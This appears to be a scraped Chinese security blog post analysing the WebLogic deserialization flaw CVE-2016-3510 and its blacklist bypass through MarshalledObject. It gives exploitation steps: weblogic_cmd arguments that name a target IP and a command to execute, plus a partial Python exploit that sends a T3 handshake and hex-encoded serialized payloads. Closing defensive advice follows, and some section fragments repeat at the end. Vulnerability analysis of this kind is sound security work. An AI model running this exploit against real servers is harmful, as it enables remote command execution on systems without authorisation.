WebLogic反序列化漏洞CVE-2016-3510分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2016-3510是Oracle WebLogic Server中的一个反序列化漏洞，它是对CVE-2015-4852漏洞修复的绕过。攻击者可以通过该漏洞实现远程命令执行。<\/p>

影响版本<\/h3>

Oracle WebLogic Server 10.3.6.0<\/li> <\/ul>

漏洞背景<\/h2>

CVE-2015-4852补丁回顾<\/h3>

Oracle对CVE-2015-4852的修复采用了黑名单机制，主要作用在以下三个位置：<\/p>

weblogic.rjvm.InboundMsgAbbrev.class::ServerChannelInputStream<\/code><\/li>
weblogic.rjvm.MsgAbbrevInputStream.class<\/code><\/li>

weblogic.iiop.Utils.class<\/code><\/li>
<\/ol>
黑名单检查位于com.bea.core.weblogic.rmi.client_1.11.0.0.jar!\/weblogic\/rjvm\/InboundMsgAbbrev.class<\/code>中，通过BLACK_LIST.contains(className)<\/code>进行类名安全检查。<\/p>
漏洞原理<\/h2>
该漏洞利用了一种巧妙的绕过黑名单的方式：<\/p>

将反序列化的对象封装进weblogic.corba.utils.MarshalledObject<\/code><\/li>
对MarshalledObject<\/code>进行序列化，生成payload字节码<\/li>
反序列化时MarshalledObject<\/code>不在WebLogic黑名单中，可以正常反序列化<\/li>
MarshalledObject<\/code>对象在调用readObject<\/code>时对其封装的序列化对象再次反序列化，从而逃过黑名单检查<\/li>
<\/ol>
漏洞分析<\/h2>
攻击流程<\/h3>

构造CC1链的payload<\/li>
将payload封装进MarshalledObject<\/code>对象<\/li>
序列化MarshalledObject<\/code>对象<\/li>
通过T3协议发送序列化数据<\/li>
<\/ol>
关键代码分析<\/h3>

Payload构造<\/strong>：<\/li>
<\/ol>
\/\/ 构造CC1链的payload
<\/span><\/span><\/span><\/span>Object payload =<\/span> CC1链构造的恶意对象<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 将payload封装进MarshalledObject
<\/span><\/span><\/span><\/span>MarshalledObject marshalledObject =<\/span> new<\/span> MarshalledObject(<\/span>payload);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化MarshalledObject
<\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> serializedData =<\/span> Serializables.<\/span>serialize<\/span>(<\/span>marshalledObject);<\/span>
<\/span><\/span><\/code><\/pre>
MarshalledObject封装<\/strong>：

MarshalledObject<\/code>类在反序列化时会自动对其封装的序列化对象进行反序列化，这一特性被用来绕过黑名单检查。<\/li>
<\/ol>
漏洞利用<\/h2>
利用工具<\/h3>
使用weblogic_cmd<\/a>工具进行漏洞利用。<\/p>
利用步骤<\/h3>

配置攻击参数：<\/li>
<\/ol>
-H "目标IP" -C "要执行的命令" -B -os win
<\/code><\/pre>

设置payload类型为"marshall"<\/li>
执行攻击<\/li>
<\/ol>
Python EXP关键部分<\/h3>
# T3协议握手<\/span>
<\/span><\/span>def<\/span> t3handshake<\/span>(sock, server_addr):
<\/span><\/span>    sock.<\/span>connect(server_addr)
<\/span><\/span>    sock.<\/span>send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'<\/span>.<\/span>decode('hex'<\/span>))
<\/span><\/span>    time.<\/span>sleep(1<\/span>)
<\/span><\/span>    sock.<\/span>recv(1024<\/span>)
<\/span><\/span>
<\/span><\/span># 构建T3请求对象<\/span>
<\/span><\/span>def<\/span> buildT3RequestObject<\/span>(dip, sock):
<\/span><\/span>    data1 =<\/span> '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706l56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'<\/span>
<\/span><\/span>    # ... 其他数据部分<\/span>
<\/span><\/span>    for<\/span> d in<\/span> [data1, data2, data3, data4]:
<\/span><\/span>        sock.<\/span>send(d.<\/span>decode('hex'<\/span>))
<\/span><\/span>        time.<\/span>sleep(2<\/span>)
<\/span><\/span>
<\/span><\/span># 发送恶意对象数据<\/span>
<\/span><\/span>def<\/span> sendEvilObjData<\/span>(sock, data):
<\/span><\/span>    payload =<\/span> '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'<\/span>
<\/span><\/span>    payload +=<\/span> data
<\/span><\/span>    payload +=<\/span> 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'<\/span>
<\/span><\/span>    payload =<\/span> '<\/span>%s%s<\/span>'<\/span> %<\/span> ('<\/span>{:08x}<\/span>'<\/span>.<\/span>format(len(payload)\/<\/span>2<\/span> +<\/span> 4<\/span>), payload)
<\/span><\/span>    sock.<\/span>send(payload.<\/span>decode('hex'<\/span>))
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

及时安装Oracle官方发布的安全补丁<\/li>
限制WebLogic Server的T3协议访问，只允许可信IP访问<\/li>
升级到不受影响的WebLogic版本<\/li>
使用网络防火墙规则限制对WebLogic端口的访问<\/li>
<\/ol>
总结<\/h2>
CVE-2016-3510展示了黑名单修复方式的局限性，通过封装序列化对象的方式可以绕过类名检查。这种思路不仅适用于WebLogic，对于其他采用黑名单机制防御反序列化漏洞的系统也有参考价值。防御此类漏洞最有效的方式是采用白名单机制或彻底禁用不安全的反序列化功能。<\/p>

WebLogic反序列化漏洞CVE-2016-3510分析与利用<\/h1>

漏洞概述<\/h2> CVE-2016-3510是Oracle WebLogic Server中的一个反序列化漏洞，它是对CVE-2015-4852漏洞修复的绕过。攻击者可以通过该漏洞实现远程命令执行。<\/p>

漏洞背景<\/h2>

漏洞分析<\/h2>

漏洞利用<\/h2>

利用工具<\/h3> 使用weblogic_cmd<\/a>工具进行漏洞利用。<\/p>

漏洞概述<\/h2>
CVE-2016-3510是Oracle WebLogic Server中的一个反序列化漏洞，它是对CVE-2015-4852漏洞修复的绕过。攻击者可以通过该漏洞实现远程命令执行。<\/p>

利用工具<\/h3>
使用weblogic_cmd<\/a>工具进行漏洞利用。<\/p>